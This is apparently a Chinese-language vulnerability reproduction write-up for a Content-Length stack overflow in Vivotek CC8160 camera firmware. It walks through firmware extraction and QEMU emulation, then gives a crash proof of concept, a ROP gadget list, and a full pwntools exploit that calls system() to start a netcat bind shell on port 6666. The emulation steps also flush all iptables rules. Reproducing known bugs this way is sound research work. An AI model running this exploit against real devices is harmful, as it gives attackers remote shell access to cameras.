Vivotek CC8160 固件栈溢出漏洞复现分析

Original 林昀山石网科安全技术研究院 2024-06-24 11:33

一、固件提取

http://download.vivotek.com/downloadfile/downloads/firmware/cc8160firmware.zip

binwalk -Me CC8160-VVTK-0113b.flash.pkg

路径_CC8160-VVTK-0113b.flash.pkg.extracted/_31.extracted/_rootfs.img.extracted/squashfs-root

确定架构为ARM、小端、32位

二、官方揭露阅读

conkielength过长导致的栈溢出在ida搜索一下Content-Length

没有检查length的长度，全部赋值到dest这个栈上变量

三、环境搭建

sudo chroot . ./qemu-arm-static ./usr/sbin/httpd

分析一下httpd文件吧搜一下字符串

发现缺少条件，但是测试的我直接给他patch掉，就不用去搞这些配置文件了

没有文件配置文件也可以跑，但是后面会用到文件中的内容，导致ddos

在文件系统里面搜索该配置文件，在./_31.extracted/defconf/_CC8160.tar.bz2.extracted/_0.extracted/etc/conf.d/boa/boa.conf，把该/etc目录拷到../mnt/flash/目录下面，即可修复该问题。

跑起来了，跟着反馈继续跟进

gethostbyname()：用域名或主机名获取IP地址。

cat /proc/sys/kernel/hostname
cat ./etc/hosts
127.0.0.1 Network-Camera localhost
debian-armel

需要把他们俩改为一致就可以跑了笔者的用户名是ubuntu

 echo "192.168.100.2 debian-armel localhost" > squashfs-root/etc/hosts

qemu宿主机环境搭建

rm -rf vmlinuz-3.2.0-4-versatile
rm -rf initrd.img-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile

设置tap0网卡net.sh 笔者的理解是

sudo ip tuntap add mode tap name tap0
sudo ip link set tap0 up
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE  #这里的网卡ens33要改成自己的噢
sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT
sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0

qemu宿主机启动脚本start.sh

sudo qemu-system-arm \
-M versatilepb \
-kernel vmlinuz-3.2.0-4-versatile \
-initrd initrd.img-3.2.0-4-versatile \
-hda debian_wheezy_armel_standard.qcow2 \
-append "root=/dev/sda1"  \
-net nic -net tap,ifname=tap0,script=no,downscript=no \
-nographic\

给qemu机器设置网卡ip

ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254

将文件传到宿主机

sudo scp -r  squashfs-root/  root@192.168.100.2:/root

启动服务

chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd

启动之后我宿主机连不上去，很奇怪

发现是httpd文件被笔者patch错了还需要对机器进行挂载和赋权操作

mount -t proc /proc ./squashfs-root/proc
mount -o bind /dev ./squashfs-root/dev
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd

四、验证poc

echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"  | netcat -v 192.168.100.2 80

进行调试发现

./gdbserver.armel --attach 192.168.100.254:1234  2440

溢出量为0x33，开了nx保护得到基地址

cat /proc/2386/maps

五、漏洞利用

rop链构造

lyyy@ubuntu:~/Desktop/vr/squashfs-root$ ROPgadget --binary ./lib/libc.so.0 --only "pop|ret"
Gadgets information
============================================================
0x00046428 : pop {fp, pc}
0x00033100 : pop {r0, pc}
0x00048784 : pop {r1, pc}
0x0000b490 : pop {r3, pc}
0x0000d71c : pop {r3, r4, r5, pc}
0x0000a46c : pop {r3, r4, r5, r6, r7, pc}
0x0000cf14 : pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x0002cf58 : pop {r3, r4, r5, r6, r7, r8, sb, pc} ; pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x000174c8 : pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000b7c0 : pop {r3, r4, r7, pc}
0x0000ae00 : pop {r4, pc}
0x0000ddf0 : pop {r4, pc} ; pop {r4, pc}
0x0000abb8 : pop {r4, r5, pc}
0x0000a83c : pop {r4, r5, r6, pc}
0x0000aa64 : pop {r4, r5, r6, r7, pc}
0x0000b364 : pop {r4, r5, r6, r7, r8, pc}
0x0000a700 : pop {r4, r5, r6, r7, r8, sb, pc}
0x0000db64 : pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000d110 : pop {r4, r5, r6, r7, r8, sb, sl, pc}
0x0000a97c : pop {r4, r5, r7, pc}
0x00042540 : pop {r4, r6, r7, pc}
0x0000b6e0 : pop {r4, r7, pc}
0x0000d320 : pop {r4, r7, pc} ; pop {r4, r7, pc}
0x0000a4ac : pop {r7, pc}

Unique gadgets found: 24

pop {r1，pc};==pop r1;ret 
mov r0,r1;

tips1 ：为什么不用，

0x00033100   pop  r0   gadeget地址带有/x00，漏洞使用strncmp，所以会有/x00截断

完整poc

from pwn import*
import requests
p=remote('192.168.100.2',80)

libc=ELF('./lib/libc.so.0')
context.log_level='debug'
libc_base=0xb6f2d000
pop_r1=0x00048784+libc_base
mov_r0_r1=0x00016aa4+libc_base
system=libc_base+libc.sym['system']
stack = 0xbeffeb64#反弹shell语句的地方
amd='aaaaaa'
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:"
payload = b'b'*(0x00003c-8)+p32(pop_r1)+p32(stack)+p32(mov_r0_r1)+b'b'*8+p32(system)
end = b'nc  -lp 6666 -e /bin/sh;'+b'\r\n\r\n'

p.sendline(head+payload+end)

把shell反弹到6666端口，nc上就是一个shell了

漏洞分析4

栈溢出1

上一篇PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)分析

Scan to Follow